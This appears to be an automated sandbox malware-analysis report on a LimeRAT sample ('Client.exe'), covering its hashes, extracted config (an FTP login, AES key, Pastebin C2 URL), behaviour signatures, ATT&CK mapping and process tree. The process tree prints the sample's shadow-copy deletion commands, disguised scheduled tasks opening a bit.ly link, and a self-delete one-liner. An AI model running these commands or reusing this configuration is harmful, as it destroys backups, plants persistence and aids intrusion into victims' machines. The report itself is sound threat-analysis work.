Overview

overview

10

Static

static

10

Client.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    1799s
  • max time network
    1803s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-04-2024 19:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    252KB

  • MD5

    7746b64cfda991754c277e8dbfcb12bf

  • SHA1

    f3d05a15cf7c4f1d07bca938076cb53df9c39e16

  • SHA256

    ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91

  • SHA512

    04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334

  • SSDEEP

    6144:tEIE/UVPy/oCa+LDZWC9z589b2vknq1dis4N:iIzPygCa+DZQnq1cP

Score
10/10
limeratevasionpersistenceransomwarerattrojan

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes
  • aes_key

    adminsigma5214881939pashalko

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/DDTVwwbu

  • download_payload

    false

  • install

    true

  • install_name

    MIcrosoft Teams.exe

  • main_folder

    True

  • payload_url

    True

  • pin_spread

    true

  • sub_folder

    False

  • usb_spread

    true

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 2 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1300
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:3036
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:1692
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1184
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
          3⤵
          • Interacts with shadow copies
          PID:2272
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2076
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2280
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:416
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2444
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3928
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3252
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2580
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4024
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:896
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3308
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c Vssadmin delete shadowstorage /all /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3408
        • C:\Windows\system32\vssadmin.exe
          Vssadmin delete shadowstorage /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:3668
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "20:17" /sc daily /mo "3" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
        2⤵
        • Creates scheduled task(s)
        PID:1372
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "18:29" /sc daily /mo "5" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
        2⤵
        • Creates scheduled task(s)
        PID:3268
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "09:53" /sc daily /mo "1" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
        2⤵
        • Creates scheduled task(s)
        PID:4952
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "13:02" /sc weekly /mo "3" /d "Sun" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
        2⤵
        • Creates scheduled task(s)
        PID:2116
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "05:01" /sc monthly /m "may" /tn "Intel Platform Trust Technology" /tr "'explorer'http://bit.ly/2uTvEZn"
        2⤵
        • Creates scheduled task(s)
        PID:1240
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        2⤵
          PID:1852
          • C:\Windows\system32\PING.EXE
            ping 0 -n 2
            3⤵
            • Runs ping.exe
            PID:1080
        • C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe
          "C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"
          2⤵
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1716
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3344

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Scheduled Task/Job

      1
      T1053

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      2
      T1543

      Windows Service

      2
      T1543.003

      Scheduled Task/Job

      1
      T1053

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      2
      T1543

      Windows Service

      2
      T1543.003

      Scheduled Task/Job

      1
      T1053

      Defense Evasion

      Modify Registry

      4
      T1112

      Impair Defenses

      2
      T1562

      Disable or Modify Tools

      2
      T1562.001

      Indicator Removal

      2
      T1070

      File Deletion

      2
      T1070.004

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      Peripheral Device Discovery

      1
      T1120

      System Information Discovery

      2
      T1082

      Remote System Discovery

      1
      T1018

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Inhibit System Recovery

      2
      T1490

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe
        Filesize

        252KB

        MD5

        7746b64cfda991754c277e8dbfcb12bf

        SHA1

        f3d05a15cf7c4f1d07bca938076cb53df9c39e16

        SHA256

        ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91

        SHA512

        04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsenrjdy.php.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • memory/1300-13-0x0000023520140000-0x0000023520150000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1300-3-0x0000023538650000-0x0000023538672000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1300-14-0x0000023520140000-0x0000023520150000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1300-12-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1300-15-0x0000023520140000-0x0000023520150000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1300-16-0x0000023520140000-0x0000023520150000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1300-18-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/5068-2-0x0000024A6EB40000-0x0000024A6EB50000-memory.dmp
        Filesize

        64KB

        Download
      • memory/5068-0-0x0000024A54500000-0x0000024A54544000-memory.dmp
        Filesize

        272KB

        Download
      • memory/5068-20-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/5068-1-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/5068-32-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
        Filesize

        10.8MB

        Download